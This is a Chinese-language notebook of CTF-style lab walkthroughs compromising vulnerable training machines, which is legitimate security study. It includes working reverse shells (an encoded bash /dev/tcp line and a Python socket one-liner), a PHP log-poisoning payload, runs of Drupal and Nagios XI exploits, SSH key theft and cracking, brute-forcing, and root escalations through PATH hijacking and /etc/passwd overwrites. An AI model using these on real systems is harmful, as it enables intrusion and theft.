:::spoiler [toc] ::: # Solstice ```bash ┌──(root㉿G)-[/home/kali] └─# nmap -sS -Pn 192.168.178.72 -p- -T5 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:27 CST Warning: 192.168.178.72 giving up on port because retransmission cap hit (2). Nmap scan report for 192.168.178.72 Host is up (0.078s latency). Not shown: 64952 closed tcp ports (reset), 574 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 2121/tcp open ccproxy-ftp 3128/tcp open squid-http 8593/tcp open unknown 54787/tcp open unknown 62524/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 428.63 seconds ``` 有許多未知服務做更進階的端口識別 ```bash ┌──(root㉿G)-[/home/kali] └─# nmap -sS -Pn 192.168.178.72 -p21,22,25,80,2121,3128,8593,54787,62524 -T5 -sC -sV Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:44 CST Nmap scan report for 192.168.178.72 Host is up (0.080s latency). PORT STATE SERVICE VERSION 21/tcp open ftp pyftpdlib 1.5.6 | ftp-syst: | STAT: | FTP server status: | Connected to: 192.168.178.72:21 | Waiting for username. | TYPE: ASCII; STRUcture: File; MODE: Stream | Data connection closed. |_End of status. 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA) | 256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA) |_ 256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519) 25/tcp open smtp Exim smtpd 4.92 | smtp-commands: solstice Hello nmap.scanme.org [192.168.45.199], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP |_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.38 (Debian) 2121/tcp open ftp pyftpdlib 1.5.6 | ftp-syst: | STAT: | FTP server status: | Connected to: 192.168.178.72:2121 | Waiting for username. | TYPE: ASCII; STRUcture: File; MODE: Stream | Data connection closed. |_End of status. | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drws------ 2 www-data www-data 4096 Jun 18 2020 pub 3128/tcp open http-proxy Squid http proxy 4.6 |_http-title: ERROR: The requested URL could not be retrieved |_http-server-header: squid/4.6 8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set 54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 62524/tcp open ftp FreeFloat ftpd 1.00 Service Info: Host: solstice; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds ``` 在 80 端口的網站沒啥可以打得，在 8593 的網站可以利用 LFI 2 RCE 在嘗試的過程中`var/log/apache2/access.log`可以被讀取，透過修改封包注入 php code `<?php echo system($_GET['cmd'];?>` 靶機問題...... # Inclusiveness 21,22,80 port open ，並且 ftp 可以 Anonymous 登入 ```bash ┌──(root㉿G)-[/tmp] └─# nmap -sS -Pn -sC 192.168.243.14 --top-ports=15 -T5 -sV Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 20:58 CST Nmap scan report for 192.168.243.14 Host is up (0.078s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.45.154 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA) | 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA) |_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519) 23/tcp closed telnet 25/tcp closed smtp 53/tcp closed domain 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Apache2 Debian Default Page: It works 110/tcp closed pop3 135/tcp closed msrpc 139/tcp closed netbios-ssn 143/tcp closed imap 443/tcp closed https 445/tcp closed microsoft-ds 3306/tcp closed mysql 3389/tcp closed ms-wbt-server 8080/tcp closed http-proxy Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds ``` 但是登入後甚麼檔案都沒有，只有一個資料夾，但是可以發現這裡允許我們上傳檔案 ```bash ┌──(kali㉿G)-[/tmp] └─$ ftp Anonymous@192.168.243.14 Connected to 192.168.243.14. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 229 Entering Extended Passive Mode (|||13394|) 150 Here comes the directory listing. drwxr-xr-x 3 0 0 4096 Feb 08 2020 . drwxr-xr-x 3 0 0 4096 Feb 08 2020 .. drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub 226 Directory send OK. ftp> cd pub 250 Directory successfully changed. ftp> ls -al 229 Entering Extended Passive Mode (|||17063|) 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Feb 08 2020 . drwxr-xr-x 3 0 0 4096 Feb 08 2020 .. 226 Directory send OK. ftp> ``` 在網頁的部分找到目錄`/manual`  似乎沒有甚麼其他好利用的，去看`/robots.txt`，網站顯示`You are not a search engine! You can't read my robots.txt!` ，換個方式訪問可以看到我們的目標目錄 ```bash ┌──(kali㉿G)-[/tmp] └─$ curl http://192.168.243.14/robots.txt --user-agent GoogleBot User-agent: * Disallow: /secret_information/ ``` 可以看到網站透過更改`?lang=`可以成功LFI  直接上傳 php-reverse-shell.php 透過讀取 `/var/ftp/pub/php-reverse-shell.php` 來RCE  提權的部分可以看到有兩個奇怪的檔案 ```bash -rwsr-xr-x 1 root root 16976 Feb 8 2020 rootshell -rw-r--r-- 1 tom tom 448 Feb 8 2020 rootshell.c www-data@inclusiveness:/home/tom$ cat rootshell.c cat rootshell.c #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> int main() { printf("checking if you are tom...\n"); FILE* f = popen("whoami", "r"); char user[80]; fgets(user, 80, f); printf("you are: %s\n", user); //printf("your euid is: %i\n", geteuid()); if (strncmp(user, "tom", 3) == 0) { printf("access granted.\n"); setuid(geteuid()); execlp("sh", "sh", (char *) 0); } } www-data@inclusiveness:/home/tom$ ``` 可以透過更改環境變數把`whoami`隨意改成我們所想要的 ```bash www-data@inclusiveness:/home/tom$ echo 'echo tom' > whoami echo 'echo tom' > whoami bash: whoami: Permission denied www-data@inclusiveness:/home/tom$ cd /tmp cd /tmp www-data@inclusiveness:/tmp$ echo "echo tom" > whoami echo "echo tom" > whoami www-data@inclusiveness:/tmp$ chmod +x whoami chmod +x whoami www-data@inclusiveness:/tmp$ export PATH=/tmp:$PATH export PATH=/tmp:$PATH www-data@inclusiveness:/tmp$ /home/tom/rootshell /home/tom/rootshell checking if you are tom... you are: tom access granted. # cat /root/proof.txt cat /root/proof.txt 8d3f0387251383abb846c12482691bbb # ^C ``` # EvilBox-One 22,80 port open 這台很考驗 fuzzing 技巧，網站打開是 Apache2 Debian Default Page 先是找到`/secret`目錄後，在 fuzzing 出 `evil.php` ```bash ┌──(kali㉿G)-[/tmp] └─$ gobuster dir -u http://192.168.155.212/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.155.212/secret [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,aspx,php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.html (Status: 403) [Size: 280] /index.html (Status: 200) [Size: 4] /.php (Status: 403) [Size: 280] /evil.php (Status: 200) [Size: 0] Progress: 55845 / 882244 (6.33%)^C [!] Keyboard interrupt detected, terminating. Progress: 55875 / 882244 (6.33%) =============================================================== Finished =============================================================== ``` 但是網頁還是一樣白的一頁  繼續 fuzzing 找到是`command`參數 ```bash ┌──(kali㉿G)-[~] └─$ ffuf -u http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirb/big.txt -fw 1 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd :: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response words: 1 ________________________________________________ command [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 76ms] :: Progress: [20469/20469] :: Job [1/1] :: 536 req/sec :: Duration: [0:00:47] :: Errors: 0 :: ``` 透過讀取`/etc/passwd`得知 user mowree，在去嘗試讀取`/home/mowree/.ssh/id_rsa` ```bash ┌──(kali㉿G)-[~] └─$ curl http://192.168.155.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6 hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb +gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg 9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1 tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs 94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7 Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS 62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69 Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8 p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp 4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/ 8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA== -----END RSA PRIVATE KEY----- ``` 在嘗試用`id_rsa`直接登入時發現不行，需要 `passphrase` ```bash ┌──(kali㉿G)-[/tmp] └─$ ssh mowree@192.168.155.212 -i id_rsa The authenticity of host '192.168.155.212 (192.168.155.212)' can't be established. ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.155.212' (ED25519) to the list of known hosts. Enter passphrase for key 'id_rsa': ``` 用`ssh2john`爆出密碼unicorn ```bash ┌──(kali㉿G)-[/tmp] └─$ ssh2john id_rsa > hash ┌──(kali㉿G)-[/tmp] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status unicorn (id_rsa) 1g 0:00:00:00 DONE (2024-09-15 17:55) 33.33g/s 42666p/s 42666c/s 42666C/s ramona..poohbear1 Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` 提權的部分，發現我們有權限寫入`/etc/passwd`，直接重新給 root password ```bash mowree@EvilBoxOne:~$ ls -al /etc/passwd -rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd mowree@EvilBoxOne:~$ openssl passwd root 9kQPB8avNoXCg ``` `naon /etc/passwd` 進去改成 `root:9kQPB8avNoXCg:0:0:root:/root:/bin/bash` ，之後直接 `su root` 輸入密碼 `root` 就拿到 `root` 了 ```bash mowree@EvilBoxOne:~$ su root Contraseña: root@EvilBoxOne:/home/mowree# cat /root/proof.txt e4d485eacaf6c6d29c6fabec6c6f4968 root@EvilBoxOne:/home/mowree# exit mowree@EvilBoxOne:~$ cerrar sesión Connection to 192.168.155.212 closed. ``` # Monitoring 22,25,80,443 port open ，網頁打開後是一個 nagios xi 的頁面，查了一下 default username 得到 `nagiosadmin` ，password 嘗試弱密碼 `admin` 登入成功  可以發現它的版本5.6.0 有一個 [RCE](https://www.exploit-db.com/exploits/47299) 漏洞可以打，而且打進去就是 root 的權限 ```bash ┌──(kali㉿G)-[/tmp] └─$ php 47299 --host=192.168.171.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.45.191 --reverseport=4444 [+] Grabbing NSP from: http://192.168.171.136/nagiosxi/login.php [+] Retrieved page contents from: http://192.168.171.136/nagiosxi/login.php [+] Extracted NSP - value: cb269f55b1f8dd0d6fc3b4c6abfff7ac92037953dd514a37790a1366cf7eec12 [+] Attempting to login... [+] Authentication success [+] Checking we have admin rights... [+] Admin access confirmed [+] Grabbing NSP from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php [+] Retrieved page contents from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php [+] Extracted NSP - value: e67bb311cc6c45ea6faf1a151d04567485e3a1812c3e4d85118276e427d71300 [+] Uploading payload... [+] Payload uploaded [+] Triggering payload: if successful, a reverse shell will spawn at 192.168.45.191:4444 ``` ```bash ┌──(kali㉿G)-[/tmp] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.45.191] from (UNKNOWN) [192.168.171.136] 44100 bash: cannot set terminal process group (954): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cat /root/proof.txt <osxi/html/includes/components/profile# cat /root/proof.txt 0b1ad11445f29d8979aeea8a165c0da2 ```  # DC-1 先掃port ， ssh http rpc service open，在打開網頁發現是 drupal 沒辦法去 CHANGLOG.txt 查看版本，只好嘗試錯誤嘗試法，在XX考試剛好有遇到 drupal RCE，在用一樣的[exploit](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py)，打一次 ```bash ┌──(kali㉿G)-[/tmp] └─$ python3 exploit.py http://192.168.157.193/ -c "echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash" ============================================================================ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps | ============================================================================= [*] Poisoning a form and including it in cache. [*] Poisoned form ID: form-LMI8DwNIM7HoyAgcZyNaC7Nxt_a4-8CoiOScL1TnwbI [*] Triggering exploit to execute: echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash ``` 之後local.txt 就拿到了  再利用簡單的[SUID提權](https://gtfobins.github.io/gtfobins/find/)利用find 開啟一個root shell  ```bash ┌──(kali㉿G)-[/tmp] └─$ hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.171.118 mysql Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-13 22:17:29 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking mysql://192.168.171.118:3306/ [STATUS] 344.00 tries/min, 344 tries in 00:01h, 14344055 to do in 694:58h, 4 active [STATUS] 335.33 tries/min, 1006 tries in 00:03h, 14343393 to do in 712:54h, 4 active [STATUS] 338.71 tries/min, 2371 tries in 00:07h, 14342028 to do in 705:43h, 4 active [STATUS] 340.07 tries/min, 5101 tries in 00:15h, 14339298 to do in 702:47h, 4 active [3306][mysql] host: 192.168.171.118 login: root password: prettywoman 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-13 22:47:15 ``` 找到`login: root password: prettywoman` 登入mysql後找到表格內容 ```bash ┌──(kali㉿G)-[/tmp] └─$ mysql -u root -h 192.168.171.118 -p --skip-ssl Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 7285 Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Support MariaDB developers by giving a star at https://github.com/MariaDB/server Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | data | | information_schema | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.081 sec) MariaDB [(none)]> use data; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [data]> show tables; +----------------+ | Tables_in_data | +----------------+ | fernet | +----------------+ 1 row in set (0.080 sec) MariaDB [data]> select * from fernet; +--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+ | cred | keyy | +--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+ | gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= | +--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+ 1 row in set (0.083 sec) MariaDB [data]> ``` 研究了陣子發現Fernet 是一種對稱加密演算法，用[online tool](https://8gwifi.org/fernet.jsp)解出來  `lucy:wJ9"Lemdv9\[FEw-` ssh 進去後local 就拿到了 ```bash ┌──(kali㉿G)-[~/Downloads] └─$ ssh lucy@192.168.171.118 -p 1337 The authenticity of host '[192.168.171.118]:1337 ([192.168.171.118]:1337)' can't be established. ED25519 key fingerprint is SHA256:K18aoM62L+/GHVzkZJScoh+S91IW1EPPvsc1K7UuVbE. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[192.168.171.118]:1337' (ED25519) to the list of known hosts. lucy@192.168.171.118's password: Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. lucy@pyexp:~$ cat local.txt .bash_history .bash_logout .bashrc local.txt .profile user.txt lucy@pyexp:~$ cat local.txt 879a9259b86d302aea312c4cdffc3929 lucy@pyexp:~$ ``` 提權的部分比較簡單 `sudo -l`可以看到` (root) NOPASSWD: /usr/bin/python2 /opt/exp.py` 把`/opt/exp.py` cat 出來很明顯的使用危險函數`exec`，利用這點 ```bash lucy@pyexp:~$ sudo -l Matching Defaults entries for lucy on pyexp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User lucy may run the following commands on pyexp: (root) NOPASSWD: /usr/bin/python2 /opt/exp.py lucy@pyexp:~$ cat /opt/exp.py uinput = raw_input('how are you?') exec(uinput) lucy@pyexp:~$ sudo /usr/bin/python2 /opt/exp.py how are you?__import__('os').system('/bin/bash') root@pyexp:/home/lucy# cat /root/proof.txt a7cafa73b9d0bc4db658cc924bd33167 root@pyexp:/home/lucy# ``` # SunsetDecoy port scan result 22 80 port open 網頁打開後是有一個zip檔，下載下來發現zip 上鎖，用`zip2john`在用john 爆出密碼manuel，unzip後裡面有passwd shadow 等等。  ```bash ┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc] └─$ ll total 24 -rw-r--r-- 1 kali kali 829 Jun 28 2020 group -rw-r--r-- 1 kali kali 33 Jun 28 2020 hostname -rw-r--r-- 1 kali kali 185 Jun 28 2020 hosts -rw-r--r-- 1 kali kali 1807 Jun 28 2020 passwd -rw-r----- 1 kali kali 1111 Jul 8 2020 shadow -r--r----- 1 kali kali 669 Feb 2 2020 sudoers ┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc] └─$ unshadow passwd shadow > hash ``` 用`unshadow`加上john，爆出user:296640a3b825115a47b68fc44501c828 ，password:server ，ssh成功登入  ```bash 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -al total 56 drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Aug 21 10:41 . drwxr-xr-x 3 root root 4096 Jun 27 2020 .. lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc -rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy -rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp lrwxrwxrwx 1 root root 7 Jun 27 2020 id -> /bin/id lrwxrwxrwx 1 root root 13 Jun 27 2020 ifconfig -> /bin/ifconfig -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Aug 21 09:57 local.txt lrwxrwxrwx 1 root root 7 Jun 27 2020 ls -> /bin/ls lrwxrwxrwx 1 root root 10 Jun 27 2020 mkdir -> /bin/mkdir -rwxr-xr-x 1 root root 807 Jun 27 2020 .profile -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 .selected_editor -rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 32 Aug 27 2020 user.txt ``` 這是一個非常受限制的shell 在考RESTRICTED SHELL ESCAPING吧，執行了下honeypot.decoy，其中輸入7會開一個vim ```bash 296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ honeypot.decoy -------------------------------------------------- Welcome to the Honey Pot administration manager (HPAM). Please select an option. 1 Date. 2 Calendar. 3 Shutdown. 4 Reboot. 5 Launch an AV Scan. 6 Check /etc/passwd. 7 Leave a note. 8 Check all services status. Option selected:7 ``` 這裡查了一下 VIM Editor Commands 找到`:r local.txt`成功拿到local.txt 之後問chat GPT大哥得知，可以幾種方式逃脫限制 ``` 使用相對路徑或只使用命令名稱 ssh user@ip -t sh 執行非互動式命令 ssh user@ip 'sh -c "你的命令"' 嘗試啟動其他不受限制的 shell ssh user@ip -t bash 透過 RBASH 逃脫 ssh user@ip -t "bash --noprofile" ``` 這邊用`-t sh`可以不受限制，但是有看到更好的解法在受限制的環境加上路徑的環境變數即可解決。 ```bash export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` e04 root 還是敲不出來擱著 # OnSystemShellDredd 先掃最常見的20個ports，只有開21 port，並且可以用Anonymous登入  用ftp連進去後`ls`沒有任何東西翻了一下才發現檔案是.開頭的  之後把`id_rsa`下載下來，由於目前的port scan 沒有任何服務是ssh的於是用`-p-`掃描全部端口  SSH連進去user 的flag就拿到了  嘗試過幾種方法最後用找suid的方式再搭配gtfobins找到`mawk`可以利用  最後拿到root flag  # Shakabrah 這次不做port scan 根據經驗22 80 會開懶得掃了，網頁打開就是告訴我要command injection，拿到user flag  之後大概花了一小時再用reverse shell還是沒結果，偷看了一下人家成功的reverse shell payload ```python ; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.208",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' ``` 在本地端收到後先拿到完整可使用的shell ```python python3 -c 'import pty; pty.spawn("/bin/bash")' ``` 用`find / -perm -u=s 2>/dev/null`結果發現vim 可以用，直接vim /root/proof.txt拿到root flag，這裡的vim 非常有病經過一坡三折後才再奇怪的畫面看到  # InfosecPrep port scan result 22 80 port open 用nmap nse 掃有發現robots.txt裡面disallow `/secret`去那看發現是一大坨base64 拿去decode後是openssh儲存成`id_rsa`，`chmod 600`連進去後就拿到user flag  後來花了2 3個小時看suid提權把所有方法是過一次，再去挖`uname -r`發現有一個剛好也是所需要的提權CEV因為那裡沒有gcc在本機編譯完再開web server結果把機的環境不支援，執行出現錯誤，在試過 github各種exploit都打不了，真的研究超久後，偷看人家怎麼打的才發現原來`bash -p`可以提權成功  # Potato 先掃常見的ports  80 port有開就先去打web，網頁只有一顆potato  用dirb先枚舉uri找到/admin  sql injected 不了繼續掃，在/admin/logs/找到user有admin  沒想法了，做一次全面的port scan ，找到2112 port 開著，在對該端口詳細調查得知是ftp並解可以用anonymous登入  cat index.php.bak得到網站code ```php <?php $pass= "potato"; //note Change this password regularly if($_GET['login']==="1"){ if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) { echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>"; setcookie('pass', $pass, time() + 365*24*3600); }else{ echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>"; } exit(); } ?> ``` 結果用admin/potato登入不了... 查了一下php bypass strcmp[參考這篇](https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016)  登入成功後，找到logs這裡用burpsuite似乎可以command injection  操作幾個注入方式拿到user flag  之後`cat /etc/passwd`得到webadmin的password hash  拿下來用john，後來我的john不省人事，用hashcat 找到密碼dragon  之後`sudo -l`來查看有啥可以用，有這個鬼可以用` /bin/nice /notes/*`，把這個硬拉去扯`/bin/sh`OK get root  # FunboxEasy port scan result  拿去dirb 找到`/store/` 網站打開就是一個可以RCE的書店，別問為啥知道(之前打過  去[exploit db](https://www.exploit-db.com/exploits/47887)找這個payload就可以打進去了，s拿到user flag 後順便收集了ssh 進去的密碼  最後`sudo -l`嘗試第一個失敗後根據經驗在挑一個試，最後get root  # Moneybox :::info 這題該怎麼說就很CTF有打過類似的 ::: port scan result 21 22 80 port open ftp 可以用Anonymous進去後就一張圖片拿去 `steghide extract -sf trytofind.jpg` 